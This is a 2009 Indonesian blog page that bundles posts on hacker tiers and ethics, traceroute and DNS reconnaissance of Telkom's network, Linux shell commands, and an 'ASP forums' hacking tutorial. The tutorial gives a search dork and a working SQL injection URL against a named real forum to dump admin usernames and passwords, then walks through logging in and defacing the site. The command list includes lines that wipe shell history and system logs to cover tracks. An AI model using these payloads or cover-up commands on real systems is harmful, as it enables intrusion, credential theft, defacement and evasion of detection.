Selasa, 28 April 2009

Tingkatan Hacker

Tingkatan Hacker


Banyak artikel / tulisan di media tentang ‘hacker’, tapi tidak banyak yang membahas tentang budaya, etika, aturan yang mengatur komunitas misterius ini. Sebuah masyarakat yang hanya ada & dikenal diantara underground (demikian istilah mereka). Tulisan ini di sadur dari beberapa bahan di Internet underground seperti tulisan Gilbert Alaverdian akan mencoba membahas hal-hal ini, agar masyarakat umum dapat mengerti sedikit tentang sub-culture di dunia underground.

Di media & stereotype masyarakat tentang hacker adalah orang yang jahat dan suka merusak. Padahal arti sebetulnya hacker adalah tidak seperti yang dibayangkan banyak orang. Stereotype ABG 15 tahun, yang duduk di belakang komputer berjam-jam, masuk ke sistem dan men-delete atau menghancurkan apa saja yang bisa mereka hancurkan – “anak” ini dikenal sebagai cracker bukan sebagai hacker. Cracker ini yang sering anda dengar di berita / media, mematikan situs web, menghapus data dan membuat kekacauan kemanapun mereka pergi.

Di dunia elektronik bawah tanah (underground) nama jarang digunakan. Orang biasanya menggunakan nama alias, callsign atau nama samaran. Hal ini memungkinkan kita bisa menyamarkan identitas, dan di kenali sesama underground. Beberapa nama populer diantara hacker Indonesia bisa dikenali seperti hC, cbug, litherr, fwerd, d_ajax, r3dshadow, cwarrior, ladybug, chiko, gelo, BigDaddy dsb..

Apakah perbedaan mendasar antara cracker & hacker? Di http://www.whatis.com, cracker di definisikan sebagai “seseorang yang masuk ke sistem orang lain, biasanya di jaringan komputer, membypass password atau lisensi program komputer, atau secara sengaja melawan keamanan komputer. Cracker dapat mengerjakan hal ini untuk keuntungan, maksud jahat, atau karena sebab lainnya karena ada tantangan. Beberapa proses pembobolan dilakukan untuk menunjukan kelemahan keamanan sistem”

Hacker menurut Eric Raymond di definisikan sebagai programmer yang pandai. Sebuah hack yang baik adalah solusi yang cantik kepada masalah programming dan “hacking” adalah proses pembuatan-nya. Menurut Raymond ada lima (5) karakteristik yang menandakan seseorang adalah hacker, yaitu:

• Seseorang yang suka belajar detail dari bahasa pemrograman atau system.
• Seseorang yang melakukan pemrograman tidak cuma berteori saja.
• Seseorang yang bisa menghargai, menikmati hasil hacking orang lain.
• Seseorang yang dapat secara cepat belajar pemrogramman.
• Seseorang yang ahli dalam bahasa pemrograman tertentu atau sistem tertentu, seperti “UNIX hacker”.

Yang menarik, ternyata dalam dunia hacker terjadi strata-strata (tingkatan) yang diberikan oleh komunitas hacker kepada seseorang karena kepiawaiannya, bukan karena umur atau senioritasnya. Saya yakin tidak semua orang setuju dengan derajat yang akan dijelaskan disini, karena ada kesan arogan terutama pada level yang tinggi. Untuk memperoleh pengakuan / derajat, seorang hacker harus mampu membuat program untuk eksploit kelemahan sistem, menulis tutorial (artikel), aktif diskusi di mailing list, membuat situs web dsb.

Hirarki Hacker
Mungkin agak terlalu kasar jika di sebut hirarki / tingkatan hacker; saya yakin istilah ini tidak sepenuhnya bisa di terima oleh masyarakat hacker. Oleh karenanya saya meminta maaf sebelumnya. Secara umum yang paling tinggi (suhu) hacker sering di sebut ‘Elite’; di Indonesia mungkin lebih sering di sebut ‘suhu’. Sedangkan, di ujung lain derajat hacker dikenal ‘wanna-be’ hacker atau dikenal sebagai ‘Lamers’.

Elite :
Juga dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global. Sanggup melakukan pemrogramman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya effisien & trampil, menggunakan pengetahuannya dengan tepat. Mereka seperti siluman dapat memasuki sistem tanpa di ketahui, walaupun mereka tidak akan menghancurkan data-data. Karena mereka selalu mengikuti peraturan yang ada. Salah satu suhu hacker di Indonesia yang saya hormati & kagumi kebetulan bekas murid saya sendiri di Teknik Elektro ITB, beliau relatif masih muda sekarang telah menjadi seorang penting di Research & Development Telkomsel.

Semi Elite:

Hacker ini biasanya lebih muda daripada Elite. Mereka juga mempunyai kemampuan & pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya). Biasanya dilengkapi dengan sejumlah kecil program cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh hacker kaliber ini, sialnya oleh para Elite mereka sering kali di kategorikan Lamer.

Developed Kiddie:

Sebutan ini terutama karena umur kelompok ini masih muda (ABG) & masih sekolah. Mereka membaca tentang metoda hacking & caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya. Umumnya mereka masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.


Script Kiddie:

Seperti developed kiddie, Script Kiddie biasanya melakukan aktifitas di atas. Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.

Lamer:

Mereka adalah orang tanpa pengalaman & pengetahuan yang ingin menjadi hacker (wanna-be hacker). Mereka biasanya membaca atau mendengar tentang hacker & ingin seperti itu. Penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit. Biasanya melakukan hacking menggunakan software trojan, nuke & DoS. Biasanya menyombongkan diri melalui IRC channel dsb. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.

Sombong
Sombong merupakan salah satu sebab utama seorang hacker tertangkap. Mereka menyombongkan diri & memproklamirkan apa yang mereka capai untuk memperoleh pengakuan dari yang lain. Hacker lain, karena pengetahuan-nya masih kurang, biasanya akan memilih target secara hati-hati. Secara perlahan mereka akan naik hirarki mereka sesuai dengan kemampuannya, tanpa menyombongkan dirinya.

Hacker Menolong Industri
Umumnya pembuatan software akan sangat berterima kasih akan masukan dari para hacker, karena dengan adanya masukan ini software yang mereka buat menjadi semakin baik. Memang kadang eksploit yang dihasilkan para hacker tidak langsung di peroleh si perusahaan software, tapi di tahan oleh komunitas underground ini – sampai digunakan oleh lamers & membuat kekacauan.

Etika

Dalam komunitas hacker ternyata ada etika & aturan main yang membedakan antara hacker & cracker, maupun hacker kelas rendahan. Salah satu etika yang berhasil di formulasikan dengan baik ada di buku Hackers: Heroes of the Computer Revolution, yang ditulis oleh Steven Levy 1984, ada 6 etika yang perlu di resapi seorang hacker:

1. Akses ke komputer – dan apapaun yang akan mengajarkan kepada anda bagaimana dunia ini berjalan / bekerja – harus dilakukan tanpa batas & total. Selalu mengutamakan pengalaman lapangan!

2. Semua informasi harus bebas, tidak di sembunyikan.

3. Tidak pernah percaya autoritas – percaya pada desentralisasi.

4. Seorang hacker hanya di nilai dari kemampuan hackingnya, bukan kriteria buatan seperti gelar, umur, posisi atau suku bangsa.

5. Seorang hacker membuat seni & keindahan di komputer.

6. Komputer dapat mengubah hidup anda menuju yang lebih baik.

Aturan Main Hacker

Gambaran umum aturan main yang perlu di ikuti seorang hacker seperti di jelaskan oleh Scorpio http://packetstorm.securify.com/docs/hack/ethics/my.code.of.ethics.html, yaitu:

• Di atas segalanya, hormati pengetahuan & kebebasan informasi.

• Memberitahukan sistem administrator akan adanya pelanggaran keamanan / lubang di keamanan yang anda lihat.

• Jangan mengambil keuntungan yang tidak fair dari hack.

• Tidak mendistribusikan & mengumpulkan software bajakan.

• Tidak pernah mengambil resiko yang bodoh – selalu mengetahui kemampuan sendiri.

• Selalu bersedia untuk secara terbuka / bebas / gratis memberitahukan & mengajarkan berbagai informasi & metoda yang diperoleh.

• Tidak pernah meng-hack sebuah sistem untuk mencuri uang.

• Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.

• Tidak pernah secara sengaja menghapus & merusak file di komputer yang dihack.

• Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.

Jelas dari Etika & Aturan main Hacker di atas, terlihat jelas sangat tidak mungkin seorang hacker betulan akan membuat kerusakan di komputer.

Teknik Mengintai Jaringan Lawan

Teknik Mengintai Jaringan Lawan


Langkah ke empat (4) terakhir dalam proses footprinting adalah melakukan pengintaian jaringan lawan, dalam bahasa Inggris-nya adalah network reconnaissance. Proses pengintaian dapat dilakukan dengan menggunakan perangkat lunak traceroute (di UNIX / Linux), atau menggunakan tracert (di Windows).

Traceroute merupakan perangkat lunak diagnostik yang pertama kali di kembangkan oleh salah satu sesepuh Internet yaitu Van Jacobson. Dengan mengakali parameter Time To Live (TTL) di paket IP agar setiap router yang dilewati mengirimkan berita ICMP_TIME_EXCEEDED, kita dapat memetakan route yang diambil oleh sebuah paket dalam jaringan Internet.

Sebagai contoh kita akan melihat hasil traceroute ke beberapa mesin yang ada di lingkungan jaringan Telkom, seperti www.telkom.co.id, www.plasa.com, in-mta1.telkom.co.id. Proses traceroute saya lakukan menggunakan sambungan dial-up menggunakan ISP indo.net.id pada kecepatan 19.2Kbps karena kebetulan memang kabel telepon di rumah saya tidak terlalu baik. Mari kita lihat beberapa kesimpulan dari peta yang kita peroleh.

[root@gate onno]# traceroute www.plasa.com
traceroute to www.plasa.com (202.134.0.172), 30 hops max, 38 byte packets
1 Digital-Tc.indo.net.id (202.159.33.29) 187.690 ms 189.692 ms 189.757 ms
2 Subnet-Gateway.indo.net.id (202.159.33.32) 189.820 ms 178.021 ms 179.822 ms
3 Loral-Gateway.indo.net.id (202.159.32.1) 189.840 ms 199.950 ms 182.850 ms 4 202.148.63.65 (202.148.63.65) 216.687 ms * 219.695 ms
5 * * 198.32.204.83 (198.32.204.83) 300.194 ms
6 * s2-4-gw1.gcc.jakarta.telkom.net.id (202.134.3.241) 490.050 ms 409.613 ms
7 * FE11-0-0.sm2.jakarta.telkom.net.id (202.134.3.149) 300.095 ms 309.653 ms
8 GigaE5-0.1.emm.jakarta.telkom.net.id (202.134.3.174) 349.822 ms 299.629 ms *
9 www.plasa.com (202.134.0.136) 400.178 ms 389.508 ms *


Tampaknya www.plasa.com berada di Jakarta, karena memlalui beberapa mesin / router penting Telkom yang ada di Jakarta; mesin gcc, sm2 kemungkinan ada di Semanggi / Sentral telkom di Gatot Subroto – yah itu hanya tebakan dari gaya penamaan mesin Telkom yang kemungkinan mengambil referensi pola penamaan tempat cara abri yang agak kriptik tapi terprediksi Waktu yang dibutuhkan untuk mengirimkan paket & dikembalikan lagi oleh www.plasa.com adalah sekitar 400 mili detik.


[root@gate onno]# traceroute in-mta1.telkom.co.id
traceroute to in-mta1.telkom.co.id (202.134.0.196), 30 hops max, 38 byte packets 1 Digital-Tc.indo.net.id (202.159.33.29) 507.252 ms 489.515 ms 509.857 ms
2 * Subnet-Gateway.indo.net.id (202.159.33.32) 200.130 ms 199.694 ms
3 Loral-Gateway.indo.net.id (202.159.32.1) 199.793 ms 189.703 ms 189.889 ms
4 202.148.63.65 (202.148.63.65) 389.829 ms 269.620 ms *
5 * * *
6 s2-4-gw1.gcc.jakarta.telkom.net.id (202.134.3.241) 869.655 ms 669.665 ms
559.793 ms
7 FE11-0-0.sm2.jakarta.telkom.net.id (202.134.3.149) 489.828 ms 419.716 ms *
8 GigaE5-0.1.emm.jakarta.telkom.net.id (202.134.3.174) 369.912 ms 219.670 ms 219.859 ms
9 in-mta2.plasa.com (202.134.0.196) 339.852 ms 239.796 ms 289.778 ms


Secara tidak sengaja kita bisa melihat ternyata in-mta1.telkom.co.id adalah juga in-mta2.plasa.com, artinya semua mail ke orang telkom dengan hostname telkom.co.id akan bisa di tangkap di in-mta2.plasa.com juga. Ini agak berbahaya sebetulnya untuk sebuah perusahaan seperti Telkom. Tampaknya in-mta2.plasa.com, in-mta1.telkom.co.id & www.plasa.com berada dalam sebuah keluarga jaringan 202.134.0.x. Jika kita mengetahui struktur organisasi Telkom, berarti 202.134.0.x merupakan tempat penyimpanan mesin-mesin yang dikelola oleh Divisi Multimedia yang mengelola plasa.com.


[root@gate onno]# traceroute www.telkom.net.id
traceroute to www.telkom.net.id (202.134.0.12), 30 hops max, 38 byte packets
1 Digital-Tc.indo.net.id (202.159.33.29) 197.334 ms 189.571 ms 189.805 ms
2 Subnet-Gateway.indo.net.id (202.159.33.32) 199.799 ms 189.752 ms 189.969
ms
3 Loral-Gateway.indo.net.id (202.159.32.1) 189.734 ms 199.678 ms 189.795 ms
4 202.148.63.65 (202.148.63.65) 249.844 ms 316.807 ms 289.855 ms
5 * * *
6 * s2-4-gw1.gcc.jakarta.telkom.net.id (202.134.3.241) 260.189 ms 299.710 ms
7 * FE11-0-0.sm2.jakarta.telkom.net.id (202.134.3.149) 320.187 ms 319.636 ms
8 * GigaE5-0.1.emm.jakarta.telkom.net.id (202.134.3.174) 330.246 ms *
9 game.plasa.com (202.134.0.12) 460.078 ms * 420.131 ms


Ah semakin yakin saja kita, dari hasil traceroute www.telkom.net.id terlihat sekali bahwa ternyata www.telkom.net.id ternyata identik dengan game.plasa.com. Jelas bahwa semua keluarga besar plasa.com & telkom.net.id adalah servis TelkomNet yang merupakan bagian dari servis Divisi Multimedia PT. Telkom; termasuk tentunya TelkomNet Instant yang sering menjadi bulan-bulan ISP Indonesia yang lain yang menunjukan ketidak adilan (ketidak fairan) Telkom dalam memberikan servis di Indonesia.

Menarik untuk di simak ternyata Divisi Multimedia memegang keluarga IP 202.134.0.x sangat predictable sekali karena logikanya 202.134.x.x kemungkinan besar adalah keluarga IP-nya PT. Telkom, dan nomor terkecil (0) di ambil oleh penyelenggara / operator-nya, yaitu Divisi Multimedia. Dari hasil traceroute juga terlihat bahwa jaringan backbone / router utama Telkom tampaknya menggunakan keluarga IP 202.134.3.x.

Selanjutnya kita mencoba melihat bagaimana dengan kantor pusat PT. Telkom Indonesia di Bandung. Mari kita lihat hasil traceroute ke www.telkom.co.id yang tampaknya berada di kantor pusat PT. Telkom di Bandung.


[root@gate onno]# traceroute www.telkom.co.id
traceroute to www.telkom.co.id (202.134.2.15), 30 hops max, 38 byte packets
1 Digital-Tc.indo.net.id (202.159.33.29) 341.254 ms 189.285 ms 189.863 ms
2 Subnet-Gateway.indo.net.id (202.159.33.32) 389.814 ms 539.738 ms 339.843 ms
3 Loral-Gateway.indo.net.id (202.159.32.1) 379.842 ms 189.737 ms 629.806 ms
4 * * *
5 198.32.204.83 (198.32.204.83) 520.177 ms 529.823 ms 489.612 ms
6 * * s2-4-gw1.gcc.jakarta.telkom.net.id (202.134.3.241) 490.196 ms
7 * FE11-0-0.sm2.jakarta.telkom.net.id (202.134.3.149) 720.213 ms *
8 * * *
9 * * fe-sm2.jakarta.telkom.net.id (202.134.3.179) 599.379 ms
10 s0-lembong.bandung.telkom.net.id (202.134.3.38) 719.669 ms 659.553 ms S4.lbg.bandung.telkom.net.id (202.134.3.50) 529.925 ms
11 192.168.16.250 (192.168.16.250) 765.193 ms 859.890 ms *
12 202.134.2.15 (202.134.2.15) 1070.083 ms 769.732 ms *


Dari hasil traceroute ke www.telkom.co.id ada yang menggelitik hati saya, ternyata ada router di IntraNet Telkom menggunakan IP 192.168.16.250 yang tampak ke jaringan public. Ini terus terang, agak menyalahi pakem untuk mendisain jaringan yang baik. Router yan menjadi firewall ke jaringan IntraNet telkom tampaknya ber-alamat IP 202.134.3.50.

Biasanya jaringan IntraNet 192.168.x.x & 10.x.x.x, harusnya tertutup untuk dilihat oleh publik. Jika perancang jaringan tersebut secara benar merancang jaringannya akan sangat sulit melakukan penetrasi jaringan menggunakan traceroute. Salah satu cara untuk melakukan traceroute menembus IntraNet, adalah dengan melakukan traceroute pada port tertentu, misalnya port 53 yang merupakan port Domain Name System (DNS) menggunakan perintah:

# traceroute –s –P53 IP_mesin_tujuan_dibalik_firewall

Bagi para administrator jaringan, tentunya akan sangat menyakitkan jika mengetahui bahwa jaringan-nya di intai oleh para hacker menggunakan traceroute. Ada beberapa software yang dapat digunakan untuk menipu / membatasi proses pengintaian tersebut, seperti snort (http://www.snort.org) yang merupakan software untuk melakukan Network Intrusion Detection System (NIDS). Kalau mau lebih jail lagi mungkin bisa menggunakan RotoRouter (http://packetstorm.securify.com/linux/trinux/src/rr-1.0.tgz) yang dapat mengirimkan responds palsu terhadap program yang melakukan tracreroute. Selain itu, anda juga dapat membatasi router-router yang ada di luar jaringan untuk membatasi traffik ICMP & UDP ke sistem yang spesifik, yang akhirnya akan mengurangi keterbukaan jaringan anda ke luar.

Interogasi DNS – melihat mesin di domain sasaran

Interogasi DNS – melihat mesin di domain sasaran


Sesudah melakukan network enumeration menggunakan perintah “whois” langkah selanjutnya yang akan banyak membantu mengidentifikasi semua domain yang berada di bawah organisasi sasaran adalah dengan mengambil infomrasi Domain Name System (DNS). DNS pada dasarnya sebuah basisdata yang terdistribusi yang melakukan pemetaan antara alamat IP dengan nama domain & sebaliknya.

Jika DNS tidak dikonfigurasi dengan baik (aman), maka akan sangat mungkin untuk melihat informasi tentang organisasi di dalamnya. Salah satu kesalahan paling fatal yang sering dilakukan oleh sistem administrator adalah mengijinkan pengguna internet yang tidak bisa dipercaya untuk melakukan zone transfer.

Zone transfer adalah fasilitas di DNS untuk mentransfer seluruh informasi tentang domain yang akan menjadi sasaran tembak. Jika anda berhasil memperoleh informasi seluruh domain tersebut, beberapa informasi yang akan membantu anda adalah entry:

HINFO – yang memberikan informasi tentang mesin yang digunakan.
MX – mesin perantara yang menerima e-mail untuk domain tersebut.

Selain beberapa informasi lainnya tentang pemetaan alamat IP dengan hostname.

Salah satu cara yang mungkin agak mudah untuk melakukan zone transfer, pada masa lalu, bisa dilakukan dengan mudah menggunakan perangkat lunak nslookup dengan perintah ls. Hanya saja, nslookup yang ada pada saat ini biasanya sudah tidak lagi dilengkapi dengan perintah ls, karena sering di salahgunakan untuk melakukan zone transfer yang diperlukan pada saat melalukan footprinting sebelum serangan di lakukan.

Alternatif lain yang dapat digunakan adalah menggunakan software dig & host. Sebagai contoh, dibawah ini adalah hasil interogasi DNS dari domain telkom.co.id mengunakan perintah host –l –v –t any.


[root@gate onno]# host -l -v -t any telkom.co.id
Trying "telkom.co.id."
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 40309
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 3, ADDITIONAL: 5

;; QUESTION SECTION:
;telkom.co.id. IN ANY

;; ANSWER SECTION:
telkom.co.id. 65237 IN MX 5 in-mta1.telkom.co.id.
telkom.co.id. 65237 IN MX 10 in-mta2.telkom.co.id.
telkom.co.id. 61859 IN A 202.134.2.15
telkom.co.id. 79371 IN NS ns3.telkom.co.id.
telkom.co.id. 79371 IN NS ns1.telkom.co.id.
telkom.co.id. 79371 IN NS ns2.telkom.co.id.

;; AUTHORITY SECTION:
telkom.co.id. 79371 IN NS ns3.telkom.co.id.
telkom.co.id. 79371 IN NS ns1.telkom.co.id.
telkom.co.id. 79371 IN NS ns2.telkom.co.id.

;; ADDITIONAL SECTION:
in-mta1.telkom.co.id. 65237 IN A 202.134.0.196
in-mta2.telkom.co.id. 65237 IN A 202.134.0.197
ns1.telkom.co.id. 79371 IN A 202.134.0.155
ns2.telkom.co.id. 79371 IN A 202.134.2.5
ns3.telkom.co.id. 79371 IN A 202.134.1.10

Received 270 bytes from 202.159.33.2#53 in 883 ms

Atau kalau anda ingin men-safe hasil interogasi-nya ke dalam file agar memudahkan untuk mengevaluasi dikemudian hari, dapat di redirect menggunakan perintah >

[root@gate onno]# host -l -v -t any telkom.co.id > zone_telkom.co.id


Kebetulan tidak banyak informasi yang dapat diperoleh dari hasil query tentang telkom.co.id. Ada beberapa entry MX, NS & A yang diperoleh dari query DNS telkom.co.id. Beberapa inti informasi tersebut adalah:

• MX berisi informasi tentang Mail Exchange, tempat e-mail dikirim ke domain tersebut.
• NS berisi informasi tentang mesin yang berfungsi membawa semua informasi DNS domain telkom.co.id.
• A adalah alamat IP dari mesin yang dimaksud.

Dengan minimalnya informasi, paling tidak yang kita ketahui bahwa:

• ada dua (2) mesin utama yang berfungsi sebagai MX untuk domain telkom.co.id yaitu in-mta1.telkom.co.id & in-mta2.telkom.co.id.
• Tampaknya mesin-mesin utama telkom.co.id berada di alamat IP keluarga 20.134.0.x.
• Tampaknya keluarga 202.134.1.x & 202.134.2.x juga perlu di evaluasi karena ada beberapa mesin penting di sana.
• Tidak ada informasi HINFO, jadi kita tidak bisa melihat secara langsung mesin / sistem operasi apa yang digunakan oleh Telkom.

Mungkin akan menarik jika kita scan / petakan semua mesin yang berada di alamat IP 202.134.0.x s/d 202.134.2.x karena akan memperlihatkan semua mesin penting yang akan mendukung kerja telkom.co.id termasuk anak-anak perusahaannya; kemungkinan besar termasuk telkom.net.id, plasa.com dll.

Jika kita ingin melihat alamat IP yang spesifik dapat juga dilakukan menggunakan program host / dig, sebagai contoh disini diperlihatkan pada saat melakukan query tentang www.telkom.co.id melalui perintah dig.


[root@gate onno]# dig www.telkom.co.id

; <<>> DiG 9.1.1 <<>> www.telkom.co.id
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36787
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 3, ADDITIONAL: 3

;; QUESTION SECTION:
;www.telkom.co.id. IN A

;; ANSWER SECTION:
www.telkom.co.id. 39899 IN A 202.134.2.15

;; AUTHORITY SECTION:
telkom.co.id. 79239 IN NS ns2.telkom.co.id.
telkom.co.id. 79239 IN NS ns3.telkom.co.id.
telkom.co.id. 79239 IN NS ns1.telkom.co.id.

;; ADDITIONAL SECTION:
ns1.telkom.co.id. 79239 IN A 202.134.0.155
ns2.telkom.co.id. 79239 IN A 202.134.2.5
ns3.telkom.co.id. 79239 IN A 202.134.1.10

;; Query time: 303 msec
;; SERVER: 202.159.33.2#53(202.159.33.2)
;; WHEN: Fri Aug 10 08:07:42 2001
;; MSG SIZE rcvd: 152



Dari informasi ini diperoleh informasi bahwa www.telkom.co.id berada dalam daerah alamat IP 202.134.2.x, jadi betul prediksi di atas bahwa mesin-mesin di daerah 202.134.0.x s/d 202.134.2.x akan membawa beberapa mesin penting untuk operasional telkom.co.id & berbagai anak perusahaan di bawahnya.

Hacking ASP Forums

Allow...semua di postingan kali ini kita akan coba belajar hacking Asp forums..langsung aja dech..
Ketik di google
inurl:/forums.asp?iFor=

Pilih target...
Contoh target
http://www.portugalweb.net/forum/forums.asp?iFor=23

Hapus angka dibelakang =
Hingga menjadi ini
http://www.portugalweb.net/forum/forums.asp?iFor=

Setelah = masukan SQL inject
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users

Hingga menjadi seperti ini
http://www.portugalweb.net/forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users


Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username
Tulisan yg berderet di bawah nama DATED itu adalah passwordnya

Cari username admin & passnya.
Ok..pada web target yg jadi bahan tutor ini saya menemukan username & password
Username : admin
Password : default

Sekarang klik tulisan login yg berada diatas.
Nah..login udah berhasil
Sekarang jika ingin melakukan defacing, klik tulisan "POST NEW TOPICS"

Isi Subject nya...
Contoh : HACKED BY BLA BLA BLA
lalu masukin script deface HTML nya ke kolom di bawah subject.

Hmm......


Trus klik tombol post....
Ok...HTML deface an lo udah masuk...sekarang klik judul postingan yg lo tulis di subject tadi.

Taraaaaaaaa..deface full :))

Perintah-perintah pada linux

Perintah-perintah pada linux
perintah perintah linux dalam shell
1. Menampilkan semua IP dalam shell : $ /sbin/ifconfig | grep inet
2. Mematikan proses dalam shell : $ kill -9
3. Melihat daftar file dalam direktori : $ ls -la
4. Mencari direktori yang ada permittion : $ find / -type d -perm 777
5. Menjadikan file read only : $ chmod 755
6. Download file : $ wget
7. Download file : $ curl -o
8. Download file : $ lwp-download
9. Memeriksa posisi direktori kita bekerja : $ pwd
10. Masuk ke direktori : $ cd
11. Menampilkan semua file yg tersembunyi (drwxrwxrwx): $ ls -FRla | grep drwxrwxrwx
12. Mencari isi direktori : $ find . -name [nama direktori] -print
13. Mencari semua ID nobody : $ find / -name *gz* -user nobody
14. Menampilkan proses background : $ ps -x
15. Menampilkan semua proses background : $ ps -ax
16. Mengganti nama file ato direktori : $ mv
17. Mencari proses file secara spesifikasi : $ find | grep
18. Menghapus history : $ history -c
19. Menghapus logs history : $ rm -f /.bash_history /root/.bash_history /var/log/messages
20. Extract file zip : $ tar -zxvf
21. Membuat file zip hanya dengan target file/direktori : $ tar -zcf
22. Membuat file zip dengan target seluruh isi direktori : $ tar -zcf
Perintah berat linux orisinil
1. $ man ls
Manual tersebut akan menampilkan bagaimana cara penggunaan perintah ls itu secara lengkap.
2. Perintah &
Perintah & dipakai dibelakang perintah lain dan menjalankannya di background. Tujuannya adalahuntuk membebaskan
shell agar bisa dipergunakan menjalankan proses-proses yang lain. Lihat juga perintah bg dan fg.
3. Perintah adduser
Biasanya hanya dilakukan oleh root untuk menambahkan user atau account yg baru. Setelah perintah ini bisa dilanjutkan
dengan perintah passwd, yaitu perintah untuk membuat password bagi user tersebut.
# adduser rayman
# passwd rayman
Selanjutnya Anda akan diminta memasukkan password untuk user rayman. Isikan password untuk rayman dua kali
dengan kata yang sama.
4. Perintah alias
Digunakan untuk memberi nama lain dari sebuah perintah. Misalnya bila Anda ingin perintah ls dapat juga
dijalankandengan mengetikkan perintah dir, maka buatlah aliasnya sbb:
$ alias dir=ls
Untuk melihat perintah-perintah apa saja yang mempunyai nama lain saat itu, cukup ketikkan alias. Lihat juga perintah
unalias.
5. Perintah bg
Untuk memaksa sebuah proses yang dihentikan sementara(suspend) agar berjalan di background. Misalnya Anda
sedang menjalankan sebuah perintah di foreground (tanpa diakhiri perintah &) dan suatu saat Anda membutuhkan shell
tersebut maka Anda dapat memberhentikan sementara perintah tersebut dengan Ctrl-Z kemudian ketikan perintah bg
untuk menjalakannya di background. Dengan cara ini Anda telah membebaskanshell tapi tetap mempertahankan
perintah lama berjalan di background. Lihat juga perintah fg.
6. Perintah cat
Menampilkan isi dari sebuah file di layar.
$ cat namafile
7. Perintah cd
Change Directory atau untuk berpindah direktori dan saya kira Anda tidak akan menemui kesulitan menggunakan
perintah ini karena cara penggunaanya mirip dengan perintah cd di DOS.
8. Perintah chgrp
Perintah ini digunakan untuk merubah kepemilikan kelompok file atau direktori. Misalnya untuk memberi ijin pada
.: aNoThEr_sIdE_aBouT_LiFE :.
http://www.obedilleh.web.id Powered by Joomla! Generated: 23 June, 2008, 15:44
kelompok atau grup agar dapat mengakses suatu file. Sintaks penulisannya adalah sbb:
# chgrp
9. Perintah chmod
Digunakan untuk menambah dan mengurangi ijin pemakai untuk mengakses file atau direktori. Anda dapat
menggunakan sistem numeric coding atau sistem letter coding. Ada tiga jenis permission/perijinan yang dapat dirubah
yaitu r untuk read, w untuk write dan x untuk execute. Dengan menggunakan letter coding, Anda dapat merubah
permission diatas untuk masing-masing u (user), g (group), o (other) dan a (all) dengan hanya memberi tanda plus (+)
untuk menambah ijin dan tanda minus (-) untuk mencabut ijin. Misalnya untuk memberikan ijin baca dan eksekusi file
coba1 kepada owner dan group, perintahnya adalah:
$ chmod ug+rx coba1
Untuk mencabut ijin-ijin tersebut:
$ chmod ug-rx coba1
Dengan menggunakan sitem numeric coding, permission untukuser, group dan other ditentukan dengan menggunakan
kombinasi angka-angka, 4, 2 dan 1 dimana 4 (read), 2 (write) dan 1 (execute).
Misalnya untuk memberikan ijin baca(4), tulis(2) dan eksekusi(1) file
coba2 kepada owner, perintahnya adalah:
$ chmod 700 coba2
Contoh lain, untuk memberi ijin baca(4) dan tulis(2) file coba3 kepada user, baca(4) saja kepada group dan other,
perintahnya adalah:
$ chmod 644 coba3
10. Perintah chown
Merubah user ID (owner) sebuah file atau direktori $ chown
11. Perintah cp
Untuk menyalin file atau copy. Misalnya untuk menyalin file1 menjadi file2: $ cp 12. Perintah fg
Mengembalikan suatu proses yang dihentikan sementar(suspend) agar berjalan kembali di foreground. Lihat juga
perintah bg diatas.
13. Perintah find
Untuk menemukan dimana letak sebuah file. Perintah ini akan mencari file sesuai dengan kriteria yang Anda tentukan.
Sintaksnya adalah perintah itu sendiri diikuti dengan nama direktori awal pencarian, kemudian nama file (bisa
menggunakan wildcard, metacharacters) dan terakhir menentukan bagaimana hasil pencarian itu akan ditampilkan.
Misalnya akan dicari semua file yang berakhiran .doc di current direktori serta tampilkan hasilnya di layar:
$ find . -name *.doc -print
. /public/docs/account.doc
. /public/docs/balance.doc
. /public/docs/statistik/prospek.doc
./public/docs/statistik/presconf.doc
14. Perintah grep
Global regular expresion parse atau grep adalah perintah untuk mencari file-file yang mengandung teks dengan kriteria
yang telah Anda tentukan. $ grep Misalnya akan dicari file-file yang mengandung teks marginal di current direktori:
$ grep marginal
diferent.doc: Catatan: perkataan marginal luas dipergunakan di dalam ilmu ekonomi prob.rtf: oleh fungsi hasil marginal
dan fungsi biaya marginal jika fungsi prob.rtf: jika biaya marginal dan hasil marginal diketahui maka biaya total
15. Perintah gzip
Ini adalah software kompresi zip versi GNU, fungsinya untuk mengkompresi sebuah file. Sintaksnya sangat sederhana: $
gzip Walaupun demikian Anda bisa memberikan parameter tertentu bila memerlukan kompresi file yang lebih baik,
silakan melihat manual page-nya. Lihat juga file tar, unzip dan zip.
16. Perintah halt
Perintah ini hanya bisa dijalankan oleh super user atau Anda harus
login sebagai root. Perintah ini untuk memberitahu kernel supaya mematikan sistem atau shutdown.
17. Perintah hostname
Untuk menampilkan host atau domain name sistem dan bisa pula digunakan untuk mengesset nama host sistem. $
hostname localhost.localdomain
18. Perintah kill
Perintah ini akan mengirimkan sinyal ke sebuah proses yang kita tentukan. Tujuannya adalah menghentikan proses. $
kill PID adalah nomor proses yang akan di hentikan.
19. Perintah less
